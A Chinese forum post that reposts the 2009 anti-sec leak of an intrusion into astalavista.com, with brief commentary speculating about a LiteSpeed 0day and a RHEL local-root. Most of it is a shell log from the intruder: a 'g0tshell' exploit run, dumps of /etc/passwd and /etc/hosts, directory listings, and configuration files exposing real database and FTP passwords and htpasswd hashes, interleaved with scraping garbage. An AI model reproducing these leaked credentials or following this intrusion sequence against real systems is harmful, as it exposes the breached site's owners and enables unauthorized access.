里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。+ B6 B/ V# `' N# y
) {5 ?$ T! c( m& d8 W. \2 J( q1 {[root@front3 ~]# curl -I litespeedtech.com0 k, l4 H; p' J: e
HTTP/1.1 200 OK
9 k: U, V$ @, @3 |( g6 vDate: Fri, 05 Jun 2009 22:54:51 GMT0 k: J2 j. f! Q4 u T i
Server: LiteSpeed1 }1 A ~1 Q& E) P& b* l7 ~: ^4 p; _2 x
2 Y, _4 a8 k% g8 ^另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_- ?2 m! j1 V, f0 m) L/ J
+ h& o7 D3 j; v5 a; B9 [有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
0 g: r- q+ ?; @! N
: T- b2 ~' Z- C+ O
6 R, o7 f- m% V4 W" `# ~/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
0 Y- u: F) K1 n+ |5 X x5 R9 l/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \3 f) B- l. S9 q' m. }4 m1 v
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \& v4 I/ I7 T9 N! n, n# D
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
" i+ f( a" o( I5 A \/ \/ \/ \/ \/ \/ \/4 O! X, s" a7 l& H9 d( s
The Hacking & Security Community
2 N8 I9 X" p9 r/ X5 b! B* ~7 m# f[+] Founded in 1997 by a hacker computer enthusiast
+ [$ k7 u. R' e0 _" D2 R[-] Exposed in 2009 by anti-sec group
) ]- T' Y6 m) v8 C- W4 {6 q* ^( _' }* V; y% l& m: g
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
7 \: r1 n! m/ K9 \* [! L8 |>> 03. Who’s behind the site?. {% t7 X8 U0 z3 I, _
>>. r9 I( M. u2 z. f s
>> A team of security and IT professionals, and a countless number of contributors from all over the world." u9 O8 K2 y/ ?
" F0 u6 Y) m; O* a- T. O( w>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
; Q& E6 Z5 t a, {; I>>
, I; ?/ \: g$ g4 x6 x/ m>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and! ?: Z# T; E6 o0 p# B- e3 _7 K
military institutions.
& G, R) ~5 z2 x, X$ U4 p v>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
, n. s [/ S/ R, I
. G; u8 d+ p! u0 iWhy has Astalavista been targeted?
% Y1 K" J3 Y" q* d9 r. U2 @. ]2 i4 }! f" n- M
Other than the fact that they are not doing any of this for the “community” but
" D* r2 [# t7 d* t" efor the money, they spread exploits for kids, claim to be a security community8 u! {6 J) W# V
(with no real sense of security on their own servers), and they charge you $6.661 C1 l% M% Q6 \! [2 s
per months to access a dead forum with a directory filled with public releases
: ?1 I/ C3 \' p8 Wand outdated / broken services.
* s* n% w) s( s \; ~; ?) d+ v2 \# n+ l
We wanted to see how good that “team of security and IT professionals” really is.
: t) c7 y! A g, V! N# I" y8 H3 `" B, W2 L& r3 b9 n' K
Let’s begin.
. B( h, F3 p d A6 p2 T! J! q
6 y0 f( B# O( B# @( y0 M" Wanti-sec:~# ./g0tshell astalavista.com -p 803 Y3 o+ h# {% b: _& Z
[+] Connecting to astalavista.com:80
0 i, q Q! u& J, W: ]5 w& T2 m* g# L[+] Grabbing banner… f" ~4 m( H2 J
LiteSpeed
6 h6 o7 W6 @7 z* P& C! w[+] Injecting shellcode…/ u) {9 a# l& U
[-] Wait for it0 m' U) W- w9 O) T- S
! V9 }6 r, s( n
[~] We g0tshell
9 t" {7 t7 _' V+ t3 [uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
6 |9 K) H$ A4 N: c. D" k' B1 LID: uid=100(apache) gid=500(apache) groups=500(apache)
$ d7 d$ ]" A; n z0 ^5 i" L
/ R8 N+ ?+ c0 I5 T0 x" ksh-3.2$ cat /etc/passwd$ L$ T) V8 m z) m
root:x:0:0:root:/root:/bin/bash j. K( {' t& p6 Y) K
bin:x:1:1:bin:/bin:/sbin/nologin" J" e e4 P6 H
daemon:x:2:2:daemon:/sbin:/sbin/nologin
$ R) D T1 B3 Ladm:x:3:4:adm:/var/adm:/sbin/nologin
% B4 \; t$ _6 }* hlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
1 w0 b) d6 ]$ E9 E& i7 Esync:x:5:0:sync:/sbin:/bin/sync. T7 X( r6 \! r3 l" p& h
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
Z# e& L# g3 `9 f7 M) V2 d( A9 vhalt:x:7:0:halt:/sbin:/sbin/halt; U5 t7 J! r8 N4 R5 G( ^
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
$ Z7 K7 t- j/ H- x8 Enews:x:9:13:news:/etc/news:
* h7 q8 V/ q% ?- h/ d$ ouucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
" a3 h( b t0 Q! e/ S" G* Loperator:x:11:0 perator:/root:/sbin/nologin+ ]$ u" H6 d& v2 l& Q4 E, C
games:x:12:100:games:/usr/games:/sbin/nologin2 ~! n7 ~2 Y; A8 o/ x
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin3 ]. }& f# U' Z' a3 S. a* d
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin) k7 Y3 }0 s7 d: J: q- D
nobody:x:99:99:Nobody:/:/sbin/nologin9 k# l. x* \7 j. G1 E# C8 x" k
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
! c. S. l0 h* D5 t+ f0 Bdbus:x:81:81:System message bus:/:/sbin/nologin8 e I$ Z4 Q6 E8 M7 C: @# v
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin* R4 \, I% }" M+ r. {. b
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin8 j8 x# Y' e U( T# F8 p
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
5 j& h! K8 p) N+ A6 I/ g) z$ `vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin) f4 h+ _' f& @6 p0 T! N# w
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin n* `! W; j. }, K
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin9 q x2 G; ]+ h# _9 b+ C
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
! g1 Z1 P% ]) l/ \' mnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin9 Q+ B9 J O" o. U2 `( q
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin( ^9 D5 Q) v7 m' n7 k. J
pcap:x:77:77::/var/arpwatch:/sbin/nologin% U9 P" q( S1 U; A& }
named:x:25:25:Named:/var/named:/sbin/nologin3 A! g' z1 ~- F
apache:x:100:500::/var/www:/bin/false
2 j3 P9 R# M/ @2 i: j9 d3 vdiradmin:x:101:101::/usr/local/directadmin:/bin/bash
% c% `, n& c. d q4 A. ?: Bmysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
# e. [+ d1 P/ twebapps:x:500:501::/var/www/html:/bin/bash
) O1 |' a( c7 [5 V* \5 A& Gmajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
# ~; F& y! \4 l: C ^admin:x:501:502::/home/admin:/bin/bash
/ }$ B% J, D9 x! x' g8 B! ^4 z1 z, Ajon:x:502:503::/home/jon:/bin/bash% W/ J; R+ I! e* g! K) ?
com:x:503:504::/home/com:/bin/bash7 u/ u/ J5 I" m& h8 Q# M# w
ntp:x:38:38::/etc/ntp:/sbin/nologin
: c7 r( Y9 w/ |& `ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin( t; Y' n; }7 i
astanet:x:504:505::/home/astanet:/bin/bash1 u/ D7 D% S4 X5 p3 x$ L! P+ G
avahi:x:70:70:Avahi daemon:/:/sbin/nologin: Y) M1 \5 ~, y! W
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin, W3 N, _9 C7 e: A8 F
5 ~% l0 |- }- _% F% O hsh-3.2$ cat /etc/hosts
9 F% `5 S6 m- z% ?# Do not remove the following line, or various programs$ i6 d1 ?0 r0 [' q
# that require network functionality will fail.# h* u/ @$ r- {1 F5 f
127.0.0.1 localhost.localdomain localhost+ B( y+ }1 E h5 F
::1 localhost6.localdomain6 localhost6
9 f& x- [0 w9 |3 r80.74.154.172 asta1.astalavistaserver.com
- A: R. U" q! T8 c- P l2 q. e/ W, c
sh-3.2$ pwd' c' C/ [, L2 u. w, @
/home/com/public_html
& E2 K7 Z# ?$ W- E; O
1 {: o1 d/ ]6 i/ ~& ]% ish-3.2$ ls -la; r9 n) T3 x( ]% ~& }' L) f
total 18460' O; D7 C# _9 G* b' K1 g$ _
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
! X& N$ l# R. Xdrwx–x–x 11 com com 4096 Jun 25 2008 ..6 n: Y" j$ L* A5 Z: f
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
1 R" L$ R: q1 c+ qdrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
) W, \1 |" {; f5 N& ^: vdrwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin+ B- ?$ t7 Z0 F: e2 O0 V
drwxrwxrwx 2 com com 4096 May 19 00:50 config) T) s1 O- P- t; x" `
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core2 I6 v8 `* E5 I5 {1 D" U' c4 y
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
$ e L- m* }3 F7 b( ?. d& H( fdrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing/ u- {9 D3 w4 h `; G3 o
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
, P! M% x; I7 b- M$ D3 c6 ~. @drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__% n# R8 N( I& y1 o
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php# D3 i9 u& Q- S+ i1 {: d) p6 o
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
' [5 x3 D' Q# q: edrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
3 B' P# V% L1 Q7 m+ w! n6 k-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico7 C- \2 u: ]* m! A% R# S) w e& G
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
3 i8 B; v8 E" U-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
) Z6 [1 x l Q6 M! ?. e; i" V-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak3 E1 `7 M9 R5 D2 b+ ?
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak6 {9 U' k- x6 V4 U& u2 \
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool4 [6 b$ M' v& Z. M# Q9 K( u U, ~# C
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images8 j8 S8 r# `. V
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php) h+ W) Q: F) k9 l6 Z# b+ |- L
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer2 s$ M% x7 T9 u) ]7 D/ t+ v
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
/ j, W9 d7 K/ H3 w% V3 _# zdrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib) t2 x2 ]; N. H( \* T L) D- o; u
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media4 o( p7 j3 I" }' D4 Z* d
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications, K/ b# F5 v4 d8 `9 L2 H/ n
drwxr-xr-x 34 com com 4096 May 28 16:30 modules
l/ K4 E& @( H# gdrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
2 S4 W. A+ F9 |drwxrwxr-x 22 com com 4096 May 28 17:06 _new
' Z* P! ?) R7 {9 i4 ]/ X6 tdrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old% u0 Z' W7 T! C8 w
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
, D% a$ d; J$ s: \/ @$ E+ Vdrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
* L- _- j- b' _$ w-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt; E- v6 F7 D) p5 \0 {. y
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
: t2 c) U& G- X* ?-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
# o; O4 ^/ j2 x* A0 r( rdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes6 ~5 l9 H G! d
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp" q8 K' Z, C, A
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam" G# h- O+ h$ J) j
2 T9 \& [" R% D$ Esh-3.2$ head -20 index.php
d+ \! g% m* u# g$ E/ [<?php
& |0 w* c% A9 d! d+ G: X# H( Z% R6 g" d" n
/**
2 e& t" y J( w* The main page for the CMS F# z& H. Q- y$ H8 [% T; _
* @copyright CONTREXX CMS - COMVATION AG$ E! Z* g; q; x; x3 O3 Z
* @author Comvation Development Team
* q5 t; ]3 `7 S! ?( i! U t* @version v1.0.9.10.1 stable
4 b7 h, g2 f7 \) B$ `2 K* @package contrexx
; B+ p3 w. P! I: N0 ^! U6 \* @subpackage core% }- R; F( T' s$ C
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
: z$ t' _2 x* V- J* @since v0.0.0.07 c& C( g5 w5 X5 O% y
* @todo Capitalize all class names in project) m) e; q# q. v. X" t
* @uses /config/configuration.php
2 F. y% w; j- W" l+ F0 L* @uses /config/settings.php/ ~4 s0 v9 n4 C* ~; j
* @uses /config/version.php
& B) m0 K7 }- W4 V* @uses /core/API.php: V2 Y, q; D6 ~) w! _2 s
* @uses /core_modules/cache/index.class.php" P* W0 o2 A, r, h6 C C
* @uses /core/error.class.php
) ?0 j* A" x3 N& s+ p( D' j0 @4 L/ A* @uses /core_modules/banner/index.class.php
4 z( P: q' w! w$ f M* @uses /core_modules/contact/index.class.php
( M! z0 H! v, `& a# R# k3 [4 G1 Z! b, I( |: s0 y8 p4 t B0 d. E' e
sh-3.2$ cd config/
' {! N9 ^6 ~; @* M& w7 hsh-3.2$ ls -la
3 ~% e/ m$ Y; q- L/ v% [1 J. J3 V+ T6 ]total 32 t4 A3 W& M! M/ ]4 Z1 `0 w- F
drwxrwxrwx 2 com com 4096 May 19 00:50 .; V% ?, C) h9 y ]
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
0 K( i/ n5 d( e-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
. v( ], S2 c' G Y-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
; k2 @- f U8 z3 j# V) W. @-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php! j" N1 M) g3 w0 V' K/ v& t
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
8 p/ ^' u; B) A2 \. h5 J
- H$ _ Q/ x5 I8 N5 ^' H7 N4 O% lsh-3.2$ cat configuration.php
' E& x& _) P- N8 o) Q: L[snip]8 q# I+ c/ {6 e/ ~, G+ M
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
- i" {" P% k7 O$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name5 U; }: _' e9 S4 b
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
( ~3 O6 `) c S6 |/ Q p. k$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
& P% d9 I- \, {6 _1 T6 b$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password% W7 d- F0 D" k" [( t6 c5 }8 w
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
. p- N/ H2 G- ^! i& O$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)2 g. ]# p9 o; \1 f
[snip]4 T; _* \' @- R3 I5 t% J4 r# F+ a( v
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false9 l: t# z: `2 s, K2 ]% j; U
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
* u7 @, x# |8 U* } [$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost# Z! o4 u# @- c$ A" | _4 e ^
$_FTPCONFIG['port'] = 21; // Ftp remote port
8 Q! z: C# e) _$ b: x1 G$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username9 ]9 F0 A. B: m* i
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
( a# ~) [' q |) T. P4 E$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
. R7 N) z/ L6 A. D
6 Q* t# N/ ]1 g g Wsh-3.2$ cd ..
% v& F7 I; d6 k# E* ysh-3.2$ cd dvd/
" }: \, F- L7 Ysh-3.2$ ls -la
8 \6 {, s- i6 I* f0 M1 ^& s' m' wtotal 2913780
y5 ?6 T( ?( ]3 P1 Q6 R# gdrwxr-xr-x 2 com com 4096 Sep 9 2008 .
' Q* e! l5 q, a) s2 ~) h9 v2 xdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
& E. Y3 [* _ n* E5 E9 j3 C-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar3 s. c* f, Y. J: b0 i5 Q- c6 K
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar9 K2 A# D' B! n0 P0 L5 f
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar& `$ @( w% ? l4 G3 k& f
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess5 F% D+ Q0 Y% w3 k' Y
+ N4 K( B. U7 s: { H
sh-3.2$ cat .htaccess
: c" z* B1 H. [2 w5 C8 KauthType Basic
4 N1 g3 G. k) f* j3 d0 G) |authName DVD
& l4 o( v* {4 @' _5 ?7 O4 R& o- cauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd# q* R( m- y5 O; r- K$ v/ h
require valid-user/ D) i; m) |/ \- s
" N" {1 C' i" l; i+ n0 Y+ m
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd7 a9 e6 H1 P& m4 S, W2 r' r
DVDdownload:CRD8cuY6.MPT68 i* m8 ~( z+ ^8 ^
DVDdownload2:CR8a36.wluFMg* P: s2 l2 x* f# E$ m6 o
$ f8 r5 D! O+ h0 P- h
sh-3.2$ cat test.php n( ?2 O! b3 k* s1 V
<?php
; y3 \) E( Z5 e8 J5 g$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;4 t! a' H6 N- W0 v( p3 i3 e( X
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
$ j: b0 e3 v; ]/ kecho $url;
9 a' k" O5 @/ w?>7 ]" Q$ o9 G0 }& b4 p
9 ], W% x; F' m
sh-3.2$ cd modifications/
4 E) }! `% Z; P! v0 fsh-3.2$ ls -la
7 Q6 w! l1 E+ _, Dtotal 32
8 j+ e. S$ i* r6 K2 Q, idrwxr-xr-x 8 com com 4096 May 11 12:48 .; u/ Z0 [; m+ H3 K `1 N* W: i) l
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
$ O0 z6 h( \: i9 q9 Ydrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng& c# i9 Y9 t0 U6 `6 }/ R
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
0 b* A5 b: F! Q8 _drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools/ V- ?& ]+ z9 f* l5 h+ o, u
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc: [2 V% J$ o( f# `3 ~5 S( n- w
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
0 W9 a# G+ U/ {4 h; zdrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
) P4 ]- R# H& t; Y' V+ }& Y+ h
. G+ R ?) B( g+ ]5 N+ a: `' csh-3.2$ ls -R
6 X. _1 [% S. b4 W.:0 Z ^) w3 @1 A
com_avtng cronjobs onlinetools pjirc search _tmp
9 K1 \, c/ T% s! V' j! Y
4 `/ D: C+ W. G( t./com_avtng:0 X+ P) Z1 @9 W+ c- f) }" |
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
, F1 h, z {( k; q) n, x( [% ~/ O9 S) }
./com_avtng/scripts:/ Z% S0 g0 E8 U b* ^3 a: x. F
popunder.js3 Z( D7 T/ R4 n% `' `
5 h) j+ N6 o) a3 R q% t+ H./cronjobs:" x) I( K$ |0 D, y9 w6 `
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp8 }$ f$ x0 v2 t0 F% D1 x3 ^( e
) [' T4 H: f" ?& ~5 A7 Z2 R./cronjobs/tmp:1 M& ?/ K3 \9 z9 l$ T; o
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
/ r; z+ r0 B8 I6 M; z8 o2 U- S* D' G9 |1 G: j+ Q
./onlinetools:4 m+ p! f2 C# v
index.php/ `7 e$ t3 M; W6 x0 U
& w2 g$ V( \. A J S+ s0 h1 N! S
./pjirc:" U4 Z. O, K N3 [$ |
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt8 D- k" P( I- B i) g# L
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt& ~8 T. S" k4 O' |/ E. b" D4 n2 m
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
5 f: v+ p$ [" g0 p% J" s c) j! V, l7 y' V) J; j
./pjirc/img:# r% ]7 V Z& |$ D) }; X Q2 H0 e
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif( o2 h) Y$ W5 l% e8 Y2 Y; m0 b
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif & ~& s5 j7 S1 b: A" S- L
verre-eau.gif
; _+ i1 e7 m, a& targh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
" v/ S4 z: X2 |# q1 ~ }verre-vin.gif' n' ^# K' K8 u# x, [) J
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif/ j8 B. `) b* v; o I
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif; z! W% a+ q! t: Y$ Z
( J( D6 W4 J$ p4 D4 h! L- V
./pjirc/snd:; a. M; i. I. d2 R4 l
bell2.au ding.au8 x; E1 H9 f {! z. L) B: t
: a9 w6 E+ v L$ r5 p
./search:3 v( n! Z V& N* n, [" `
searchEngines.php search.php3 ~2 _$ X, I4 z2 O4 v
' M. N- {# G! }6 F! k+ \
./_tmp:
) B; d, r! c X- K& K9 K$ ldefaultPorts.php defaultPorts.txt+ `- c/ q8 F/ s0 r4 D
$ w5 m4 Y ?6 e# B$ i: P
sh-3.2$ cd cronjobs/, ?9 S" y9 G# b' d, l
sh-3.2$ cat exploits.php
+ M+ J0 D+ t7 R) C" t- N( u5 f: _[snip]
. {) i V6 c% A5 ?- M% v$categories = array();7 G! i: [6 i( l @# y/ y' T
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;5 p# R3 v! _0 a6 V$ \) x( ^
$expolits = file($milw0rmFile);
& z& S6 J. e4 j/ Q- B( {: c$comExploits = array();
5 `$ Y9 c' N' B3 ?: T% [[snip]
" N1 G) ^6 b" }; e% W m// manage data
5 k' b+ q6 x1 z: B6 i$ k3 \; jfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640# f6 `2 \4 P$ H. Y: e
2 C& q7 M" o7 n3 k* _ { h; K& t // get path and title
# T; [. ^/ Y2 P$ I $expolits[$x] = trim($expolits[$x]);
( Y F' A4 w6 [6 Y8 ?! ?2 G $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
) U% L W4 ~% T& P $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);8 z! w9 W2 e: q4 {# z
. F. _3 B' Z, `0 v% R% @" |* _/ }
// check if file exists/ V4 u' B9 d7 a* F: ~6 F" p8 j
if (file_exists($path)) {# a: R# J1 V; ~- d
3 h4 Q7 a* X% ?7 R: C $text = file_get_contents($path); u( R* p7 X$ B* E# p, B: Z. X
V* }' w- k* e7 f( G7 ]) c // get content and date, z6 M5 f) C9 b. C% r
//$text = htmlspecialchars($text, ENT_QUOTES);, J0 h$ a8 S3 c1 ^0 p5 x& F. T
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
# s! u7 m4 m5 L6 M6 p* o if ($tmptext != ”) {4 ?' w2 ~+ |* `* ?6 n4 A
$text = $tmptext;
5 i2 Y' l/ S1 I' U* G } else {
9 w. O' r6 U1 s$ L f $text = addslashes(htmlentities($text, ENT_QUOTES));7 Q( c" C* w1 {4 K2 I% G+ [& m8 l6 S
}0 h+ I; @6 g- [- Y( i. d0 C. N$ g2 u
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
) ^9 Z4 l0 X/ L3 h1 q $tmp = explode('-', $date);
6 c% L; b1 O% c; Q $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
+ U9 ~& L( X6 _' X $cat = getCategory ($path);/ L* l+ j4 y' |- Y7 H, ^2 X9 J* `; Y
$ext = pathinfo(basename($path));
; Y/ t4 Y! M- }* z% c( L/ p $ext = $ext['extension'];$ C4 K% g5 x: S) q1 r$ k
$qStr = ”
3 ~2 n* |; N- K- _+ o SELECT `id`
, G9 A2 V1 j6 r FROM `contrexx_module_exploits`
+ F1 c/ V1 r8 v; P WHERE `title` = ‘” . $title . “‘' M. o1 e: r. D4 x7 p
AND `date` = ‘” . $date . “‘7 p2 T( S _5 C- k8 }2 }
“;* a0 ~) G# [' T
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
" Q2 Z; T8 l4 R) b $q = $_objDB->query($qStr);
# q' L) q( W3 z( N E$ z0 e+ z; S" L* Q+ A- g3 L
if ($q->numRows() == 0) {
j( j, q- N3 s+ o. W/ c
0 s& k1 v7 h; K& _* j // prepare array
0 F: j# K8 U) @8 {6 d $comExploits[$x]['date'] = $date;0 @6 t, N! @; ]6 }
$comExploits[$x]['title'] = $title;
8 Z: b, R+ D' ^" d' L' E $comExploits[$x]['author'] = ‘milw0rm’;# _6 K6 `! K# r: u' J
$comExploits[$x]['text'] = $text;' ^% e4 D& M& J* e7 N: m
$comExploits[$x]['source'] = $ext;
, h9 M: K) n+ v. F$ h $comExploits[$x]['url1'] = ”;& ?0 Q' B e) z7 r* X; g
$comExploits[$x]['url2'] = ”; Q" a5 W) V* r: m# }
$comExploits[$x]['catid'] = $cat;
9 ^" g/ A1 g/ h) q $comExploits[$x]['lang'] = ‘2′;2 [9 s: P( A) ]/ ^: L
$comExploits[$x]['userid'] = ‘12′;8 \1 M4 s' H' K
$comExploits[$x]['startdate'] = ‘0000-00-00′;/ p' [; p# m# ^/ q% H
$comExploits[$x]['enddate'] = ‘0000-00-00′;0 T2 e) G# a, j) |+ ^6 g
$comExploits[$x]['status'] = ‘1′;
. M; b3 t# D. r( C8 D8 } $comExploits[$x]['changelog'] = $date;
7 U5 G; e% y5 W( N# b" q7 }; a; T( \
}
: R3 l/ m. {" X/ A7 v[snip] k+ z4 e! Q9 H& z/ s$ m, W
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
& L2 j% }8 e4 Z6 \<rss version=”2.0″>: P f$ s0 k4 i. O0 z& S% Z3 N
<channel>
& S* y& q; S4 F) ^; l' h+ q. X <title>ASTALAVISTA.com - Exploits</title>7 d9 Y' p; [, B: e
<link>http://www.astalavista.com/exploits</link>8 z- y E; c5 s, r) [
<description>All availably Exploits.</description>6 Q+ ~' O; h. ]7 f7 s; T, q
<language>en-us</language>
